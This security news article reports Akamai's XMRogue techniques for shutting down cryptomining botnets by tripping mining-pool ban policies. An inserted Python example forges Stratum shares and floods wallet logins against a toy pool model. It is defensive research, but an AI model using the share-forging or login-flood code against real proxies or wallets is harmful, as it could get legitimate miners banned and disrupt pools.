Disrupting the operations of cryptocurrency mining botnets
Cybersecurity researchers devised two attack techniques to disrupt the operations of cryptocurrency mining botnets.
Akamai researchers devised two novel techniques to disrupt cryptocurrency mining botnets by exploiting weaknesses in common mining topologies.
The current ways to stop a cryptocurrency mining botnet are pool bans or infrastructure takedowns; however, both are slow and complex. The researchers developed two faster techniques that exploit the Stratum mining protocol and mining pool policies to disrupt operations by targeting the botnet's proxies or wallets, potentially forcing attackers to abandon their campaigns.
“We developed two techniques by leveraging the mining topologies and pool policies that enable us to reduce a cryptominer botnet’s effectiveness to the point of completely shutting it down, which forces the attacker to make radical changes to their infrastructure or even abandon the entire campaign,” reads the report published by Akamai.
The researchers developed XMRogue, a tool that disrupts cryptomining botnets that rely on mining proxies. XMRogue lets a defender impersonate a miner, connect to the attacker's mining proxy, submit consecutive bad shares (invalid mining job results), and thereby get the mining proxy banned by the pool.
“When mining using a proxy, all the victims are connected to a single server, which means that interfering with the proxy can bring the entire mining operation down,” continues the report. “The idea is simple: By connecting to a malicious proxy as a miner, we can submit invalid mining job results — bad shares — that will bypass the proxy validation and will be submitted to the pool. Consecutive bad shares will eventually get the proxy banned, effectively halting mining operations for the entire cryptomining botnet.”
By sending crafted invalid shares (bad hashes) over Stratum to the malicious proxy, the defender triggers a pool-level ban of the proxy, halting the attacker's operation. The proxy only performs cheap checks on a share before forwarding it upstream, so XMRogue gets past that validation by formatting the share fields correctly; the pool, which fully validates the hash, is the one that rejects the shares and applies the ban.

In tests conducted by Akamai, banning proxies reduced one campaign's annual revenue from $50K to $12K, a 76% drop, potentially forcing the attacker to abandon the campaign.
Akamai's second technique targets miners connected directly to public pools without proxies. By flooding the pool with more than 1,000 login attempts using the attacker's wallet, the wallet gets temporarily banned for one hour. Although not permanent, this disruption can significantly hinder the attack. The researchers demonstrated the technique against Monero miners, but it is adaptable to other cryptocurrencies whose pools enforce similar policies.
“When we inspected the mining pool’s source code, another option came to mind — targeting the wallet address. While the previous bad shares policy targeted miner IP addresses, we identified an additional policy that is enforced at the wallet level — the pool will ban the wallet’s address for one hour if it has more than 1,000 workers,” continues the report. “When using proxy mining, an attacker can embed their wallet address entirely on the proxy server, enabling them to effectively mask it. But in situations where direct mining is performed, the wallet address must be present on the victim machine, which allows us to extract it. Getting the attacker banned in this case is simple — we just send more than 1,000 login requests using the attacker’s wallet concurrently, which will force the pool to ban the attacker’s wallet.”
The researchers implemented this second attack technique in the XMRogue tool as well.
The techniques above demonstrate how defenders can disrupt malicious cryptominer campaigns by exploiting mining pool policies without affecting legitimate miners. While a legitimate user can quickly recover by changing their IP address or wallet, attackers face a much bigger challenge: recovering a malicious campaign would require changes across the entire botnet, which makes this defense especially effective against less sophisticated operations.
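Both techniques above come down to the same mechanism: a pool-side policy that a defender can deliberately trip on the attacker's behalf. The following is an added example, not Akamai's XMRogue code. It builds the Monero Stratum JSON-RPC messages a miner sends (login and submit), forges a share whose fields are well-formed and whose result passes the cheap target check a proxy applies, and runs both attacks against a toy pool model that enforces the two policies the article describes: consecutive bad shares ban the submitting IP (the proxy's), and more than 1,000 workers on one wallet ban the wallet. The sample job, wallet, IPs, the SHA-256 stand-in for the pool's real RandomX hash, the simplified target widening, and the bad-share threshold of 10 are constructed assumptions for the demo, not values from any real pool.

```python
"""Added example (not XMRogue): Stratum share forging against a toy pool model."""
import hashlib
import secrets

# Constructed sample job in the shape a Stratum pool/proxy returns after login.
SAMPLE_JOB = {
    "job_id": "a1b2c3",
    "blob": "0c0c" + "00" * 74,  # 76-byte hashing blob, zero-filled for the demo
    "target": "b88d0600",        # 32-bit little-endian target (constructed value)
}
WALLET = "4" + "A" * 94  # placeholder with the 95-character shape of a Monero address


def login_msg(wallet, msg_id=1, worker="x"):
    """Stratum 'login' request; a real pool answers with an rpc id and a job."""
    return {"id": msg_id, "jsonrpc": "2.0", "method": "login",
            "params": {"login": wallet, "pass": worker, "agent": "xmrig/6.21.0"}}


def meets_target(result_hex, target_hex):
    """Cheap difficulty check a proxy can do without re-hashing: the last 8 bytes
    of the 32-byte result, read little-endian, must be below the target.
    A 32-bit target is widened by padding the low 32 bits with ones (simplified)."""
    target = int.from_bytes(bytes.fromhex(target_hex), "little")
    if len(target_hex) == 8:
        target = (target << 32) | 0xFFFFFFFF
    return int.from_bytes(bytes.fromhex(result_hex)[24:], "little") < target


def make_bad_share(rpc_id, job, msg_id=2):
    """Forged 'submit': 8-hex nonce and 64-hex result with a tail that beats the
    target, but the result is random rather than the hash of blob+nonce."""
    return {"id": msg_id, "jsonrpc": "2.0", "method": "submit",
            "params": {"id": rpc_id, "job_id": job["job_id"],
                       "nonce": secrets.token_hex(4),
                       "result": secrets.token_hex(24) + "00" * 8}}


def proxy_accepts(submit, job):
    """Format-and-target validation a proxy applies before forwarding upstream."""
    p = submit["params"]
    return (p["job_id"] == job["job_id"] and len(p["nonce"]) == 8
            and len(p["result"]) == 64 and meets_target(p["result"], job["target"]))


class ToyPool:
    """Pool-side policy model. max_workers follows the article (>1,000 per wallet);
    max_bad_shares is an assumed value, the article does not state one."""

    def __init__(self, max_bad_shares=10, max_workers=1000):
        self.max_bad_shares, self.max_workers = max_bad_shares, max_workers
        self.bad_streak, self.banned_ips = {}, set()
        self.workers, self.banned_wallets = {}, set()

    @staticmethod
    def full_hash(job, nonce):
        """Stand-in for the RandomX hash a real pool recomputes for every share."""
        return hashlib.sha256(bytes.fromhex(job["blob"] + nonce)).hexdigest()

    def login(self, ip, msg):
        wallet = msg["params"]["login"]
        if wallet in self.banned_wallets:
            return "banned"
        self.workers[wallet] = self.workers.get(wallet, 0) + 1
        if self.workers[wallet] > self.max_workers:
            self.banned_wallets.add(wallet)  # wallet-level ban (one hour in the article)
            return "banned"
        return "OK"

    def submit(self, ip, msg, job):
        if ip in self.banned_ips:
            return "banned"
        p = msg["params"]
        valid = (p["job_id"] == job["job_id"]
                 and self.full_hash(job, p["nonce"]) == p["result"]
                 and meets_target(p["result"], job["target"]))
        if valid:
            self.bad_streak[ip] = 0
            return "OK"
        self.bad_streak[ip] = self.bad_streak.get(ip, 0) + 1
        if self.bad_streak[ip] >= self.max_bad_shares:
            self.banned_ips.add(ip)  # the proxy's IP: every victim behind it stops earning
            return "banned"
        return "rejected"


def run_bad_share_attack(pool, proxy_ip, job, n=12):
    """Method 1: forged shares pass the proxy and reach the pool from the proxy's IP."""
    outcomes = []
    for i in range(n):
        share = make_bad_share("rpc-1", job, msg_id=i + 2)
        if proxy_accepts(share, job):  # the proxy forwards it upstream
            outcomes.append(pool.submit(proxy_ip, share, job))
    return outcomes


def run_wallet_flood(pool, wallet, n=1001):
    """Method 2: open more than 1,000 worker logins on the extracted wallet."""
    return [pool.login(f"198.51.100.{i % 254 + 1}", login_msg(wallet, i + 1, f"w{i}"))
            for i in range(n)]
```

Running `run_bad_share_attack` against `ToyPool()` yields nine "rejected" results followed by "banned" for every later share from the proxy's IP, which is the outcome the article describes for the whole botnet behind that proxy; `run_wallet_flood` returns "OK" for the first 1,000 logins and "banned" on the 1,001st. The design point worth noting is the asymmetry the forged share exploits: the proxy can only afford the target comparison, so any result with a small enough tail is forwarded, while the pool recomputes the hash and counts the miss against the proxy, not the defender.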
“We believe that the threat of cryptominers will continue to grow over time. But now we can fight back and disrupt the attacker’s operation, making it much more challenging to monetize cryptominers effectively,” concludes the report.
(SecurityAffairs – hacking, cryptocurrency mining botnets)